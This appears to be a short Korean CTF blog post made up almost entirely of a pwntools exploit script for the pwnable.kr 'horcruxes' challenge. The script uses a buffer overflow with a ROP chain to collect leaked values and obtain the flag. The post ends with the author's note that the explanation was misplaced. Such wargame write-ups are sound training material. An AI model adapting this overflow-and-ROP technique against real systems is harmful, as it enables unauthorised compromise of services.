System Hacking
[pwnable.kr] horcruxes
BIGFROG
2020. 1. 9. 18:18
from pwn import *
context.log_level = 'debug'
s = ssh(user='horcruxes', host='pwnable.kr', port=2222, password='guest')
conn = s.connect_remote('localhost',9032)
A_addr = 0x809fe4b
B_addr = 0x809fe6a
C_addr = 0x809fe89
D_addr = 0x809fea8
E_addr = 0x809fec7
F_addr = 0x809fee6
G_addr = 0x809ff05
call_ropme_addr = 0x0809fffc
payload = 'A'*120
payload += p32(A_addr)
payload += p32(B_addr)
payload += p32(C_addr)
payload += p32(D_addr)
payload += p32(E_addr)
payload += p32(F_addr)
payload += p32(G_addr)
payload += p32(call_ropme_addr)
conn.recvuntil("Select Menu:")
conn.sendline("1")
conn.recvuntil("How many EXP did you earned? : ")
conn.sendline(payload)
sum = 0
for i in range(0,7):
conn.recvuntil("EXP +")
sum += int(conn.recvuntil(')')[:-1])
conn.recvuntil("Select Menu:")
conn.sendline("1")
conn.recvuntil("How many EXP did you earned? : ")
conn.sendline(str(sum))
conn.recv(2048)
conn.interactive()
풀고나서 캡쳐만 해두고 블로그에 바로 업로드를 안하니까 해설을 어디에 썼는지를 까먹었다..
시간을 내서 다시 해설을 써야겠다..